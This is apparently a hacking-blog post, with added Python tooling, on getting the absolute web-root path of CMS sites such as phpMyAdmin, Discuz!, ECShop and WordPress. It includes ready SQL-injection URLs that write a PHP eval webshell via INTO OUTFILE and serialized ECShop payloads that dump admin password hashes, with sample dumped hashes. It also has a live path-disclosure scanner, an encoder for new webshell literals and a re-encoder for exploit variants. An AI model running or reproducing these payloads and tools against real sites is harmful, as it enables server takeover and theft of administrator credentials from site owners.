Notes on full-path disclosure methods for various CMS sites


Absolute path information disclosure

Preface

Writing a webshell very often requires the absolute (physical) path of the web root, so here is a quick note of what I happened to come across.

phpMyAdmin path disclosure:
phpmyadmin/libraries/select_lang.lib.php    (yields the physical path)
phpmyadmin/themes/darkblue_orange/layout.inc.php
phpmyadmin/index.php?lang[]=1
phpMyAdmin/phpinfo.php
phpmyadmin/libraries/mcrypt.lib.php
phpmyadmin/libraries/export/xls.php

phpMyAdmin latest redirect vulnerability (a client-side injection through error.php rather than a path leak; the payload's own text says as much):
error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.safeclub.tk%40_self]This%20Is%20a%20Link[%2Fa]

DedeCMS universal path disclosure:
http://www.dedecms.com/plus/paycenter/alipay/return_url.php
http://www.dedecms.com/plus/paycenter/cbpayment/autoreceive.php
http://www.dedecms.com/plus/paycenter/nps/config_pay_nps.php
http://www.dedecms.com/plus/task/dede-maketimehtml.php
http://www.dedecms.com/plus/task/dede-optimize-table.php
http://www.dedecms.com/plus/task/dede-upcache.php

include/dialoguser/login.php
include/dialog/select_soft.php    (reveals the admin backend)
 

Discuz! 5.2 / 5.1 / 4.1 / 4.0 path disclosure:
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%3D1
http://www.discuz.net/viewthread.php?tid=316&pid=1453&page[]=1&extra=page%3D1#pid1453
 

Discuz! 7.2 manyou plugin path disclosure (7.1 is affected too):
/manyou/sources/notice.php
/manyou/admincp.php?my_suffix=%0A%0DTOBY57

Writing a shell through it (the database account needs the file-write privilege, i.e. INTO OUTFILE/DUMPFILE must be allowed):
http://www.0daynet.com/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27%20union%20select%20NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL%20into%20outfile%20%27E://hackertest.php%27%23%A1%B1

After registering a user, submit:
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
 

Discuz! 5.5 path disclosure:
wap/include/search.inc.php

If the current database account has File_priv, we can also write the shell directly with INTO OUTFILE:

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash='union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
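The 0x… literal in both INTO OUTFILE payloads above (the manyou one and this one) is a MySQL hex-string literal. The Python below is an added example, not code from the original post: it decodes that literal, re-encodes it, and checks why a hex literal is needed at all. The injection sits inside a single-quoted hash= value, so a shell containing quotes or backslashes could not be written as a normal quoted string without being broken by the closing quote or by addslashes()/magic_quotes escaping; an unquoted 0x token avoids that. The literal is copied from this page; nothing else is assumed.

```python
# Added example, not from the original post: decode/encode the MySQL 0x literal
# used in the INTO OUTFILE payloads and show why hex encoding is chosen.

PAGE_LITERAL = "0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E"  # from the page

# Bytes that cannot appear verbatim inside a quoted MySQL string in an injection:
# quotes terminate the string, a backslash starts an escape, and addslashes()/
# magic_quotes_gpc rewrite all of them on the way in.
_UNSAFE = b"'\"\\\x00"


def mysql_hex_literal(data: bytes) -> str:
    """Encode bytes as a MySQL 0x... literal (an unquoted token the server decodes)."""
    return "0x" + data.hex().upper()


def decode_mysql_hex_literal(literal: str) -> bytes:
    """Inverse of mysql_hex_literal; rejects anything that is not a well-formed 0x literal."""
    if literal[:2].lower() != "0x" or len(literal) % 2 != 0:
        raise ValueError("not a MySQL hex literal: %r" % literal)
    return bytes.fromhex(literal[2:])


def needs_hex(payload: bytes) -> bool:
    """True when the payload could not survive inside a quoted SQL string literal."""
    return any(b in payload for b in _UNSAFE)


def explain(literal: str) -> dict:
    """Decode a literal taken from a captured payload and report what it contains."""
    shell = decode_mysql_hex_literal(literal)
    return {
        "decoded": shell.decode("latin-1"),
        "length": len(shell),
        "needs_hex": needs_hex(shell),
        "round_trip_ok": mysql_hex_literal(shell).lower() == literal.lower(),
    }


if __name__ == "__main__":
    for key, value in explain(PAGE_LITERAL).items():
        print("%-14s %r" % (key, value))
```

Running it shows the literal is a 27-byte `<?php @eval($_POST['O']);?>`, which contains single quotes and therefore has to travel as hex. The same encoder produces a literal for any other one-liner you need to write with INTO OUTFILE.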

ECShop 2.7.0 dumping the admin password:
/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

ECShop path disclosure:
/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A

Locating the DedeCMS admin backend
Sometimes you obtain the DedeCMS admin password through injection but cannot find the backend URL. In that case try appending this to the site address:
/include/dialog/select_media.php?f=form1.murl

Z-BLOG 1.8 Walle Build 100427 path disclosure
admin/FCKeditor/editor/dialog/fck%5Fspellerpages/spellerpages/server%2Dscripts/spellchecker.php
 

WordPress (old versions) path disclosure:
wp-content/plugins/akismet/akismet.php
wp-content/plugins/hello.php
wp-content/themes/default/404.php
wp-admin/themes
wp-content/themes/default
wp-settings.php
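All of the direct-request entries on this page (phpMyAdmin, DedeCMS, the Discuz! manyou and wap files, the Z-BLOG spellchecker, the WordPress files above) work the same way: a script that expects to be included by a front controller is requested on its own, PHP raises a warning or fatal error, and the error text names the file by its absolute path. The Python below is an added example, not code from the original post: it requests each probe path, pulls Unix or Windows absolute paths out of the response body, and derives the document root by locating the requested relative path (or one of its parent directories, since the leaked path is often an included library rather than the script that was requested) inside the leaked path. The host target.example and the sample responses are constructed placeholders; the probe list contains only this page's own entries.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

# Added example, not from the original post.  Probe paths are the page's own
# direct-request entries, relative to the site root.
FPD_PATHS = [
    "phpmyadmin/libraries/select_lang.lib.php",
    "phpmyadmin/themes/darkblue_orange/layout.inc.php",
    "phpmyadmin/index.php?lang[]=1",
    "phpmyadmin/libraries/mcrypt.lib.php",
    "plus/paycenter/alipay/return_url.php",
    "plus/task/dede-maketimehtml.php",
    "include/dialog/select_soft.php",
    "manyou/sources/notice.php",
    "wap/include/search.inc.php",
    "admin/FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php",
    "wp-content/plugins/akismet/akismet.php",
    "wp-content/plugins/hello.php",
    "wp-content/themes/default/404.php",
    "wp-settings.php",
]

# PHP error output names the script:  "... in /var/www/x.php on line 12"
# or "... in C:\inetpub\wwwroot\x.php on line 12".  Match either path style.
_ABS_PATH = re.compile(r'''((?:[A-Za-z]:[\\/]|/)[^\s<>"'()]*?\.(?:php|inc|phtml))''')


def extract_paths(body):
    """Return the distinct absolute script paths leaked in a response body, in order."""
    found = []
    for m in _ABS_PATH.finditer(body):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found


def web_root(leaked, requested):
    """Derive the document root from a leaked absolute path.  Try the full requested
    relative path first, then its parent directories, because the leaked file is
    often an included library rather than the script that was requested."""
    rel = urlsplit(requested).path.strip("/")
    norm = leaked.replace("\\", "/")
    parts = rel.split("/")
    for n in range(len(parts), 0, -1):
        suffix = "/" + "/".join(parts[:n]).lower()
        suffix += "" if n == len(parts) else "/"
        idx = norm.lower().find(suffix)
        if idx != -1:
            root = norm[:idx] or "/"
            return root.replace("/", "\\") if re.match(r"^[A-Za-z]:", root) else root
    return None


def probe(base_url, paths=FPD_PATHS, fetch=None):
    """Request every probe path; return (probe, leaked_path, document_root) hits.
    `fetch` is injectable so the logic can run offline.  The default does a real GET
    and keeps the body of 4xx/5xx responses, which usually carry the warning."""
    if fetch is None:
        def fetch(url):
            try:
                with urllib.request.urlopen(url, timeout=10) as resp:
                    return resp.read().decode("utf-8", "replace")
            except urllib.error.HTTPError as err:
                return err.read().decode("utf-8", "replace")
            except OSError:
                return ""
    hits = []
    for p in paths:
        for leaked in extract_paths(fetch(urljoin(base_url, p))):
            hits.append((p, leaked, web_root(leaked, p)))
    return hits


# Constructed responses (not captured from any real host) for an offline run.
BASE = "http://target.example/"  # placeholder host
SAMPLE_RESPONSES = {
    "wp-content/plugins/hello.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function add_action() in "
        "<b>C:\\inetpub\\wwwroot\\blog\\wp-content\\plugins\\hello.php</b> on line <b>57</b><br />\n",
    "phpmyadmin/index.php?lang[]=1":
        "<b>Warning</b>:  strpos() expects parameter 1 to be string, array given in "
        "<b>/var/www/html/phpmyadmin/libraries/select_lang.lib.php</b> on line <b>38</b>",
    "wp-settings.php": "<html><body>nothing leaked here</body></html>",
}


def demo():
    """Run the probe against the constructed responses instead of the network."""
    return probe(BASE, list(SAMPLE_RESPONSES),
                 fetch=lambda url: SAMPLE_RESPONSES[url[len(BASE):]])


if __name__ == "__main__":
    for probe_path, leaked, root in demo():
        print("%-32s %s  (root: %s)" % (probe_path, leaked, root))
```

Against a live target, call `probe("http://host/")` with the default fetcher; the document root it returns is exactly the value needed for the INTO OUTFILE payloads elsewhere on this page. Windows roots come back with backslashes so they can be pasted into a MySQL path as-is, and a hit with root `None` means the leaked path did not contain the requested path or any of its directories, which usually indicates a vhost or symlink layout that needs a manual look.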
 

Tomcat 3.1 path disclosure (request an arbitrary .jsp name):
http://narco.guerrilla.sucks.co:8080/anything.jsp

 

ShopEx 4.8.4 path disclosure and database download:
install/svinfo.php?phpinfo=true
home/cache/cachedata.php
shopadmin/index.php?ctl=sfile&act=getDB&p[0]=http://www.cnblogs.com/config/config.php

ECShop store-system variant intrusion
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

For example: http://www.****.com/search.php?encode=YToxOntzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTI3ODY2NzMwNTt9

Note the trailing encode= parameter; this is where the variant EXP payload goes:

YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
http://www.****.com/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

Opening it dumps the usernames and password hashes:
 ('椰子:75b747bbd05cb68a66b792f8c0c6e002"') union select 1#"','ggg:822fc056b87417e4bc68969c150ca5c6"') union select 1#"')

Backend path: /admin/index.php

The passwords are MD5 hashes; what comes next needs no further explanation.....
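This section and the "ECShop 2.7.0" one above use the same opaque encode= value. It is base64 over PHP serialize(): the benign example above decodes to a:1:{s:18:"search_encode_time";i:1278667305;}, and the EXP decodes to an attr array whose key (not its value) carries the SQL, with a 0x3a colon separating user_name and password in the output. The Python below is an added example, not ECShop's code: a minimal unserialize()/serialize() for the types these values use (strings, integers, booleans, null, arrays) plus decode/encode helpers that round-trip both values on this page, so a variant can be built by editing the decoded structure rather than the base64 by hand. Which ECShop query the attr key is concatenated into is not shown on the page and is not claimed here.

```python
import base64

# Added example, not ECShop's code: decode and rebuild the search.php encode= value.

# Both values copied from this page.
NORMAL_ENCODE = "YToxOntzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTI3ODY2NzMwNTt9"
EXP_ENCODE = "YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319"


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() covering N, b, i, s and a (enough for these payloads).
    Strings are length-prefixed, so embedded quotes and backslashes need no escaping."""
    pos = 0

    def read_until(ch):
        nonlocal pos
        end = data.index(ch, pos)
        token = data[pos:end]
        pos = end + 1
        return token

    def value():
        nonlocal pos
        t = data[pos:pos + 1]
        if t == b"N":
            pos += 2                     # "N;"
            return None
        pos += 2                         # skip "<type>:"
        if t == b"i":
            return int(read_until(b";"))
        if t == b"b":
            return read_until(b";") == b"1"
        if t == b"s":
            n = int(read_until(b":"))
            pos += 1                     # opening quote
            s = data[pos:pos + n]
            pos += n + 2                 # closing quote and ';'
            return s.decode("latin-1")   # byte-for-byte, as PHP counts lengths
        if t == b"a":
            n = int(read_until(b":"))
            pos += 1                     # '{'
            out = {}
            for _ in range(n):
                k = value()
                out[k] = value()
            pos += 1                     # '}'
            return out
        raise ValueError("unsupported type %r at offset %d" % (t, pos))

    return value()


def php_serialize(v) -> bytes:
    """Inverse of php_unserialize for the same types (dicts become PHP arrays)."""
    if v is None:
        return b"N;"
    if isinstance(v, bool):
        return b"b:%d;" % v
    if isinstance(v, int):
        return b"i:%d;" % v
    if isinstance(v, str):
        raw = v.encode("latin-1")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(v, dict):
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return b"a:%d:{%s}" % (len(v), body)
    raise TypeError("cannot serialize %r" % type(v))


def decode_encode_param(value: str):
    """base64 -> PHP serialized -> Python structure."""
    return php_unserialize(base64.b64decode(value))


def encode_param(obj) -> str:
    """Python structure -> PHP serialized -> base64, ready for search.php?encode=."""
    return base64.b64encode(php_serialize(obj)).decode("ascii")


def injected_sql(decoded) -> list:
    """Keys under `attr` that carry SQL metacharacters, i.e. the injection vector."""
    attr = decoded.get("attr", {}) if isinstance(decoded, dict) else {}
    return [k for k in attr if isinstance(k, str) and any(c in k for c in "'#()")]


if __name__ == "__main__":
    print(decode_encode_param(NORMAL_ENCODE))
    for key in injected_sql(decode_encode_param(EXP_ENCODE)):
        print("injected attr key:", key)
```

To change the dumped table or columns, decode EXP_ENCODE, replace the attr key with your own string, and re-encode; the serializer recomputes the s:125 length prefix, which is the part that is easy to get wrong when editing the base64 directly.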

vBulletin 3.6.4 path disclosure:
http://192.168.240.129/forum/admincp/index.php?do=phpinfo

U-MAIL: getting a shell from the backend:
After logging in, go to stationery management, add a stationery, and upload a one-line PHP shell as its preview image; the response gives the file's address.

PHPCMS 2008 SP4 path disclosure: first register a user at
/member/register.php, log in as that user, then request the following to dump the physical path:
/corpandresize/process.php?pic=../images/logo.gif
Backend login: /admin.php
 

shopv8 v10.84 store system injection vulnerability

At the injection point http://127.0.0.1:99/list.asp?id=322, use an injection relay (a local page that forwards the value through the cookie) and dump the username and password, as shown in the screenshot:

Injection statement:

http://127.0.0.1:99/jmCook.asp?jmdcw=322%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53%20from%20admin

Look up the plaintext on an MD5 lookup site, then log into the backend and do what you came to do.

Sun GlassFish Enterprise Server v2.1.1

Search keyword: Sun GlassFish Enterprise Server v2.1.1 /editor/fckeditor/editor/
Google it and you will see the directory listing.
This is an editor (FCKeditor) issue.

Source: http://www.safe6.cn/

This article was written by safe6, who holds the copyright; any form of reproduction requires the author's permission and must credit the source.


All programs and articles on this site are for study and research only; they must not be used for commercial or illegal purposes, otherwise the user bears all consequences. Last edited: 2019-10-22
